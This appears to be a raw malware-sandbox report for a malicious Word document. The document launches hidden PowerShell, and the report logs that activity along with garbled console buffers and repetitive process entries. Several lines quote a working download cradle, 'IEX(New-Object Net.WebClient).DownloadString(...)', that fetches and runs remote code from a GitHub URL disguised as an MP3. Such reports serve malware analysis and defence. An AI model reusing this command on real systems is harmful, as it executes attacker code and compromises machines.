Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................Sj.....\..............................}..v....x]......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................By............................. .................................................x.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................Sj....p%..............................}..v.....%......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................P.Sj....P.W.............................}..v.....,......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................Sj....p-..............................}..v.....-......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................P.Sj....P.W.............................}..v....X3......0.......................~.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................Sj.....4..............................}..v.....4......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.3. .c.h.a.r.:.1.8...............}..v.....8......0.................W.....".......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................Sj....X9..............................}..v.....9......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................P.Sj....P.W.............................}..v.....@......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................Sj....XA..............................}..v.....A......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............O.u.t.F.i.l.e. .".e.n.d...v.b.s."...............}..v.....E......0.................W.....".......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................Sj.....F..............................}..v.... G......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................P.Sj....P.W.............................}..v.....M......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................Sj.....N..............................}..v.... O......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....PS......0.................W.....4.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................Sj.....T..............................}..v.....T......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................P.Sj....P.W.............................}..v.....Y......0.......................l.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................Sj.....Z..............................}..v.....[......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .......P.Sj....P.W.............................}..v.....^......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................Sj....H_..............................}..v....._......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#...............P.Sj....P.W.............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#.................Sj....H...............................}..v............0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../...............P.Sj....P.W.............................}..v.....$......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../.................Sj....H%..............................}..v.....%......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;...............P.Sj....P.W.............................}..v....0+......0.......................~.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;.................Sj.....+..............................}..v....h,......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G.......A.t. .l.i.n.e.:.4. .c.h.a.r.:.1.8...............}..v....x0......0.................W.....".......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G.................Sj....01..............................}..v.....1......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............P.Sj....P.W.............................}..v....x8......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S.................Sj....09..............................}..v.....9......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._.......u.t.F.i.l.e. .".h.s.t.a.r.t...v.b.s."...........}..v.....=......0.................W.....&.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._.................Sj.....>..............................}..v.....?......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k...............P.Sj....P.W.............................}..v.....E......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k.................Sj.....F..............................}..v.....G......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w....... . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....0K......0.................W.....4.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w.................Sj.....K..............................}..v....hL......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................P.Sj....P.W.............................}..v.....Q......0.......................l.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................Sj....`R..............................}..v.....R......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .......P.Sj....P.W.............................}..v....pV......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................Sj....(W..............................}..v.....W......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................P.Sj....P.W.............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................Sj....................................}..v............0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................P.Sj....P.W.............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................Sj....................................}..v............0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................P.Sj....P.W.............................}..v....x"......0.......................~.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................Sj....0#..............................}..v.....#......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.5. .c.h.a.r.:.1.8...............}..v.....'......0.................W.....".......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................Sj....x(..............................}..v.....(......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................P.Sj....P.W.............................}..v...../......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................Sj....x0..............................}..v.....0......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............u.t.F.i.l.e. .".s.t.a.r.t...c.m.d.".............}..v.....5......0.................W.....$.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................Sj.....5..............................}..v....@6......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................P.Sj....P.W.............................}..v.....=......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................Sj.....=..............................}..v....@>......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....pB......0.................W.....4.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................Sj....(C..............................}..v.....C......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................P.Sj....P.W.............................}..v.....H......0.......................l.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................Sj.....I..............................}..v.... J......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .......P.Sj....P.W.............................}..v.....M......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................Sj....hN..............................}..v.....N......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................P.Sj....P.W.............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................Sj....`...............................}..v............0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'.......n.n.o.t. .f.i.n.d. .t.h.e. .f.i.l.e. .s.p.e.c.i.f.i.e.d.........0.................W.....:.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'.................Sj....................................}..v....X.......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3.......A.t. .l.i.n.e.:.7. .c.h.a.r.:.1.4...............}..v....h.......0.................W.....".......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3.................Sj.... ...............................}..v............0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?...............P.Sj....P.W.............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?.................Sj....................................}..v....@.......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K...............P.Sj....P.W.............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K.................Sj....................................}..v....@.......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W....... . . .e.r.a.t.i.o.n.E.x.c.e.p.t.i.o.n...........}..v....X.......0.................W.....&.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W.................Sj....................................}..v............0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c...............P.Sj....P.W.............................}..v....X.......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c.................Sj....................................}..v............0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o....... . . .o.m.m.a.n.d.s...S.t.a.r.t.P.r.o.c.e.s.s.C.o.m.m.a.n.d.....0.................W.....<.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o.................Sj....................................}..v............0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{....... .......P.Sj....P.W.............................}..v............0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{.................Sj....P...............................}..v............0.................W.............................
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3')
Source: RfORrHIRNe.docOLE indicator, Word Document stream: true
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$ORrHIRNe.docJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD815.tmpJump to behavior
Source: classification engineClassification label: mal88.expl.winDOC@3/10@3/2
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: RfORrHIRNeJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: powershell.exe, 00000001.00000002.424943589.000000001CCD0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
Source: RfORrHIRNe.docOLE document summary: title field not present or empty
Source: ~WRF{28D4A0D4-699A-4F69-8702-D3F95AC65D58}.tmp.0.drOLE document summary: title field not present or empty
Source: ~WRF{28D4A0D4-699A-4F69-8702-D3F95AC65D58}.tmp.0.drOLE document summary: author field not present or empty
Source: ~WRF{28D4A0D4-699A-4F69-8702-D3F95AC65D58}.tmp.0.drOLE document summary: edited time not present or 0
Source: ~DFA094A62AA4BA8959.TMP.0.drOLE document summary: title field not present or empty
Source: ~DFA094A62AA4BA8959.TMP.0.drOLE document summary: author field not present or empty
Source: ~DFA094A62AA4BA8959.TMP.0.drOLE document summary: edited time not present or 0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.419412789.0000000002827000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000001.00000002.419412789.0000000002827000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.419412789.0000000002827000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000001.00000002.419412789.0000000002827000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000001.00000002.419412789.0000000002827000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.419412789.0000000002827000.00000004.00000040.sdmp
Source: ~WRF{28D4A0D4-699A-4F69-8702-D3F95AC65D58}.tmp.0.drInitial sample: OLE indicators vbamacros = False

Data Obfuscation:

barindex
Suspicious powershell command line foundShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
